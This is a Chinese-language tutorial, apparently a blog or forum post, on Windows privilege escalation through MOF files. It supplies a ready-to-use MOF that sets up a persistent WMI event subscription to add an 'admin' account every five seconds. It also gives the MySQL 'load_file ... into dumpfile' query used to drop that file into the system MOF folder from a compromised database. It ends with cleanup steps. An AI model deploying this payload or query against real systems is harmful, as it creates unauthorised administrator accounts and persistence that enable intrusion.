原理解读:
Windows 管理规范 (WMI) 提供了以下三种方法编译到 WMI 存储库的托管对象格式 (MOF) 文件:
方法 1: 运行 MOF 文件指定为命令行参数将 Mofcomp.exe 文件。
方法2: 使用 IMofCompiler 接口和 $ CompileFile 方法。
方法 3: 拖放到 %SystemRoot%System32WbemMOF 文件夹的 MOF 文件。
Microsoft 建议您到存储库编译 MOF 文件使用前两种方法。也就是运行 Mofcomp.exe 文件,或使用 IMofCompiler::CompileFile 方法。
注意:
第三种方法仅为向后兼容性与早期版本(win2003)的 WMI 提供,并因为此功能可能不会提供在将来的版本后,不应使用。
下面的代码是mof文件内容,默认添加一个admin的账户,可以自行修改
-------------------------------XXX.MOF-----------------------------------------------------------
#pragma namespace("\\.\root\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa "Win32_LocalTime" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject("WScript.Shell")
WSH.run("net.exe user admin admin /add")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
-------------------------------XXX.MOF end-----------------------------------------------------------
最近的MYSQL提权也是利用此法.
1.找个可写目录,上传或新建mof文件
2.执行sql
select load_file('C:\www\nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';
//注意这里C:\www\nullevt.mof是你上传mof文件的随意路径,但后面的那个路径是固定的
注意已执行的mof会一直不停地执行,每隔5秒执行一次mof文件里面的cmd,昨天测试的时候放了个.mof到C:WINDOWSsystem32wbemmof 从昨天晚上一直到现在还在每过5秒就执行次 加个用户,搞的我郁闷死了。。。
解决办法:
第一 net stop winmgmt 停止服务,
第二 删除文件夹:C:WINDOWSsystem32wbemRepository
第三 net start winmgmt 启动服务
第四:完毕不会在执行了。
C:WINDOWSsystem32wbemRepository 放的是储存库 我们执行的.mof都会被加入到这个库了。然后一直按脚本设置的时间执行。。 删除后 重新启动 会重建个默认储存库 这样我们先前执行mof就没了。